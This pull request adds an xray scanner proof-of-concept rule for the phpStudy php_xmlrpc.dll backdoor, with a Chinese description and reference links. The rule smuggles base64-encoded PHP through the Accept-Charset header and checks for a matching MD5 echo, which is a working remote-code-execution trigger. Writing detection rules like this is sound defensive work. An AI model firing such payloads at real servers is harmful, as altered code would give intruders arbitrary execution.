### PR TITLE
phpstudy-backdoor-rce

### DIFF
--- a/pocs/phpstudy-backdoor-rce.yml
+++ b/pocs/phpstudy-backdoor-rce.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-phpstudy-backdoor-rce
+rules:
+  - method: GET
+    path: /index.php
+    headers:
+      Accept-Encoding: 'gzip,deflate'
+      Accept-Charset: cHJpbnRmKG1kNSgzMzMpKTs=
+    follow_redirects: false
+    expression: |
+      body.bcontains(b'310dcbbf4cce62f762a2aaa148d556bd')
+detail:
+  author: 17bdw
+  Affected Version: "phpstudy 2016、phpstudy 2018,5.2&5.4"
+  vuln_url: "php_xmlrpc.dll"
+  links:
+    - https://www.freebuf.com/column/214946.html
+    - https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
+    - https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
+    - https://mp.weixin.qq.com/s/CqHrDFcubyn_y5NTfYvkQw

--- a/pocs/phpstudy-backdoor-rce.yml
+++ b/pocs/phpstudy-backdoor-rce.yml
@@ -4,10 +4,10 @@ rules:
     path: /index.php
     headers:
       Accept-Encoding: 'gzip,deflate'
-      Accept-Charset: cHJpbnRmKG1kNSgzMzMpKTs=
+      Accept-Charset: cHJpbnRmKG1kNSg0NTczMTM0NCkpOw==
     follow_redirects: false
     expression: |
-      body.bcontains(b'310dcbbf4cce62f762a2aaa148d556bd')
+      body.bcontains(b'a5952fb670b54572bcec7440a554633e')
 detail:
   author: 17bdw
   Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"

--- a/pocs/phpstudy-backdoor-rce.yml
+++ b/pocs/phpstudy-backdoor-rce.yml
@@ -10,10 +10,7 @@ rules:
       body.bcontains(b'310dcbbf4cce62f762a2aaa148d556bd')
 detail:
   author: 17bdw
-  Affected Version: "phpstudy 2016、phpstudy 2018,5.2&5.4"
+  Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
   vuln_url: "php_xmlrpc.dll"
   links:
     - https://www.freebuf.com/column/214946.html
-    - https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
-    - https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
-    - https://mp.weixin.qq.com/s/CqHrDFcubyn_y5NTfYvkQw


### PR DESCRIPTION
phpstudy-backdoor-rce

**请先确保符合以下几点要求**

 - 阅读 poc 提交规范 https://chaitin.github.io/xray/#/guide/contribute
 - 本 repo 中已经合并的和未合并的 pull request 中不含有相同的 poc
 - 一个 pull request 尽量只提交一个 poc，否则可能审核和修改过程会比较慢
 - 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员
 - 下方的测试环境请勿使用公网上未修复的站点的地址，可以是 [vulhub](https://github.com/vulhub/vulhub/) 或者其他的环境
 - 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。
 
我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可

----------

## 本 poc 是检测什么漏洞的

phpstudy后门检测

## 测试环境

phpstudy2018或者2016，PHP 5.4&5.2

## 备注

- PhpStudyGhost后门供应链攻击事件及相关IOC
https://www.freebuf.com/column/214946.html
- 2019关于phpstudy软件后门简单分析
https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
- phpstudy后门文件分析以及检测脚本
https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
- Phpstudy官网于2016年被入侵，犯罪分子篡改软件并植入后门
https://mp.weixin.qq.com/s/CqHrDFcubyn_y5NTfYvkQw
- phpstudy后门文件分析以及检测脚本
https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw
- phpStudy隐藏后门预警 
https://www.cnblogs.com/0daybug/p/11571119.html

